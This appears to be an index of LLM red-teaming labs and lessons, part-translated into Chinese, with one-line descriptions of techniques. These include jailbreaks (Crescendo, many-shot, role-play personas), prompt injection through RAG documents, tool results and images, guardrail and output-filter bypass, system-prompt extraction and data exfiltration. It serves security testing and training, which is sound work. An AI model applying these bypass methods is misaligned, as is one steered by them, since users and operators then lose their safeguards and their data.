利用 Unicode normalization differences between input validation and model processing to smuggle injection payloads.
實驗室: Vector Database Access Control Testing
Test vector database access controls for bypass vulnerabilities including namespace traversal and filter manipulation.
代理 Goal Hijacking
Redirect an AI agent's objectives through carefully crafted inputs that override its primary task.
Assistant Prefill Injection 攻擊s
利用 assistant message prefilling to prime model responses and bypass safety alignment.
Chat History Manipulation 攻擊s
Inject false messages into conversation history to alter model behavior in subsequent turns.
Input Classifier Boundary Mapping
Systematically probe input classifiers to map their decision boundaries and find bypass regions.
Context Window Boundary 利用ation
Exploit the boundaries of context windows to push safety instructions beyond the model's attention.
Crescendo 攻擊 Implementation
Implement Microsoft's Crescendo multi-turn escalation attack with automated conversation management.
Cross-Plugin 利用ation Chaining
Chain exploits across multiple plugins/tools in an agent system to achieve multi-step attacks.
Function Schema Manipulation
利用 function calling schemas to inject instructions through parameter descriptions and enums.
Building Custom Garak Probes
Develop custom probe modules for NVIDIA Garak to test organization-specific vulnerability patterns.
Guardrail Latency-Based Detection
Use timing side channels to identify and characterize guardrail implementations in LLM applications.
Custom Inspect AI Safety Evaluations
Build custom safety evaluation tasks in Inspect AI to test application-specific vulnerability classes.
越獄Bench Comparative Testing
Run standardized jailbreak benchmarks across multiple models and compare vulnerability profiles.
JSON Mode Safety Bypass
利用 structured JSON output modes to bypass safety filters that only check plain-text responses.
LLM Guard Evasion Techniques
Develop evasion techniques against LLM Guard input scanners and output detectors.
Implementing Many-Shot 越獄ing
Implement Anthropic's many-shot jailbreaking technique with scaling analysis across conversation lengths.
MCP Resource Data Exfiltration (中階 實驗室)
利用 MCP resource URIs to access and exfiltrate data beyond intended scope boundaries.
Multi-Language Safety Gap 利用ation
Systematically identify and exploit safety training gaps across low-resource languages.
Multi-Turn State Tracking 利用ation
利用 state management in multi-turn conversations to gradually shift model behavior over many turns.
NeMo Guardrails Bypass Techniques
Test and bypass NVIDIA NeMo Guardrails configurations using known evasion techniques.
Output Filter Bypass via Encoding
Bypass output safety filters by instructing the model to encode responses in Base64, hex, or custom schemes.
PDF Document Injection for RAG Systems
Craft adversarial PDF documents that inject instructions when processed by RAG document loaders.
Prompt Template Variable Injection
Inject adversarial content through template variable expansion in prompt management systems.
PyRIT Custom 攻擊 Strategies
Build custom attack strategies and converters in Microsoft's PyRIT framework for targeted campaigns.
RAG Document Injection Campaign
Design and execute a document injection campaign against a RAG-powered application with vector search.
Semantic Search 投毒
Craft adversarial documents that rank highly in semantic search for targeted queries in RAG systems.
Streaming Response Exfiltration
利用 streaming API responses to exfiltrate data that might be caught by batch output filters.
System Prompt Extraction via Token Probabilities
利用 token probability APIs to reconstruct hidden system prompts character by character.
Token Boundary Manipulation
利用 tokenizer-specific behavior by crafting inputs that split across token boundaries in unexpected ways.
工具 Result Injection 攻擊s
Craft malicious tool return values that inject instructions back into the model's reasoning chain.
Injecting Text via Images to VLMs
Embed adversarial text in images that vision-language models read and follow as instructions.
實驗室: Data Exfiltration via Webhooks
Test data exfiltration paths through LLM-triggered webhooks, API callbacks, and external URL rendering.
模擬:新創 AI 評估
以有限範圍與預算對新創之 AI 驅動產品紅隊,於徹底與時間約束間作務實權衡。
Code Injection via Markdown
Injecting executable payloads through markdown rendering in LLM outputs, exploiting the gap between text generation and content rendering in web-based LLM interfaces.
Context Window Stuffing
Techniques for filling the LLM context window to push system instructions out of active memory, manipulating token budgets to dilute or displace defensive prompts.
Delimiter Escape 攻擊s
Techniques for escaping delimiters used to separate system and user content in LLM applications, breaking out of sandboxed input regions to inject instructions.
Encoding-Based Evasion
Using base64, ROT13, hexadecimal, Unicode, and other encoding schemes to evade input detection systems and bypass content filters in LLM applications.
Few-Shot Injection
Using crafted few-shot examples within user input to steer LLM behavior toward unintended outputs, exploiting in-context learning to override safety training.
Payload Obfuscation Techniques
Methods for disguising prompt injection payloads through encoding, splitting, substitution, and other obfuscation techniques to bypass input filters and detection systems.
Role-Play Injection
Using fictional scenarios, character role-play, and narrative framing to bypass LLM safety filters by having the model operate within a permissive fictional context.
Translation Injection
Using translation requests and low-resource languages to bypass content filters, exploiting the uneven distribution of safety training across languages.
Virtual Persona Creation
Creating persistent alternate personas within LLM conversations to bypass safety training, establishing character identities that override the model's default behavioral constraints.